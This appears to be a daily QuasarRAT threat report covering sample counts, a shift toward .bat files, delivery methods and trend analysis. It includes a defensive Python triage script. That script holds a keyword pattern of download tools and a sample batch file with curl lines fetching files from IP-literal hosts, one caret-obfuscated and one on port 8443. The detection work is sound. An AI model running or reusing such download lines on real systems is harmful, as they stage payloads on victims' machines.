QuasarRAT - Daily Threat Report

Sunday, June 21, 2026

Daily Summary

QuasarRAT activity declined sharply on 2026-06-21 with only 3 new samples detected, representing a 74% drop from the 7-day average of 12. This continues a downward trend, though the sample types suggest possible shifts in delivery tactics rather than an overall threat reduction.

New Samples Detected

The three samples collected today introduce an unusual diversity in file types: one .bat, one .xlsm, and one .exe. The presence of a .bat file is notable, as QuasarRAT historically favors compiled executables or macro-enabled Office documents. This suggests threat actors may be experimenting with script-based initial access, possibly to bypass static analysis rules that flag common PE headers.

Distribution Methods

The inclusion of an .xlsm sample aligns with ongoing phishing campaigns, but the concurrent appearance of a .bat file is unexpected. Delivery via .bat often points to automated droppers sent as spear-phishing attachments or shared via cloud storage links. This mix may indicate a small but targeted wave rather than broad spamming, as the volume is low enough to suggest hand-picked victims.

7-Day Trend

Today’s 3 samples represent a 74% decline from the 7-day average of 12, placing activity at a quarter of typical levels. This deviation exceeds the 25% threshold for highlighting a trend change. The drop could reflect operational pauses by established groups, shifts to other RATs, or pre-staging for a larger campaign, but sustained monitoring is needed before concluding a genuine downturn.

Security Analysis

The low sample count alongside the appearance of .bat files is a non-obvious development, as QuasarRAT payloads in script form are rare. This may indicate actors probing detection gaps in environments that focus on Office macros or PE files but overlook batch scripts flagged as “low risk.” Defenders should update detection rules to flag any .bat file that attempts process injection, network connections to uncommon ports, or downloads from IP addresses, especially in conjunction with recent user-reported email anomalies.
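A static triage pass for two of the behaviours named above (downloads from IP-literal hosts and URLs on uncommon ports) is sketched below as an added example; it is not code from this report or its data sources. The tool list, the "common" port set and the sample script are assumptions constructed for illustration, and process injection is left out because this pass only reads the script text.

```python
import ipaddress
import re
from urllib.parse import urlsplit

COMMON_PORTS = {80, 443}  # assumption: ports treated as normal for web downloads
# Assumption: tools commonly used from batch files to fetch content; extend locally.
DOWNLOAD_HINTS = re.compile(
    r"\b(curl|wget|certutil|bitsadmin|powershell|Invoke-WebRequest)\b", re.I)
URL_RE = re.compile(r"https?://[^\s\"'<>|&)]+", re.I)

# Constructed sample; hosts are documentation address ranges (RFC 5737).
SAMPLE = r"""@echo off
rem constructed sample for the triage function
curl -s -o "%TEMP%\u.dat" http://203.0.113.7:8443/u.dat
cu^rl -O https://198.51.100.20/b.dat
curl -O https://updates.example.com/tool.zip
ping -n 1 192.0.2.1
"""

def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def triage_batch(text):
    """Return (line_no, reason, url) findings for the text of a .bat file."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.replace("^", "")  # cmd.exe drops unquoted carets, so undo the split
        if line.lstrip().lower().startswith(("rem ", "::")):
            continue  # comment lines are not executed
        fetches = bool(DOWNLOAD_HINTS.search(line))
        for url in URL_RE.findall(line):
            try:
                parts = urlsplit(url)
                host, port = parts.hostname or "", parts.port
            except ValueError:
                findings.append((no, "malformed-url", url))
                continue
            if fetches and is_ip_literal(host):
                findings.append((no, "download-from-ip", url))
            if port is not None and port not in COMMON_PORTS:
                findings.append((no, "uncommon-port", url))
    return findings

if __name__ == "__main__":
    for finding in triage_batch(SAMPLE):
        print(finding)
```

Findings from a pass like this are triage signals to correlate with mail-gateway and endpoint telemetry, not verdicts on their own.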

Data Sources

MalwareBazaar (abuse.ch), ThreatFox (abuse.ch), URLhaus (abuse.ch)
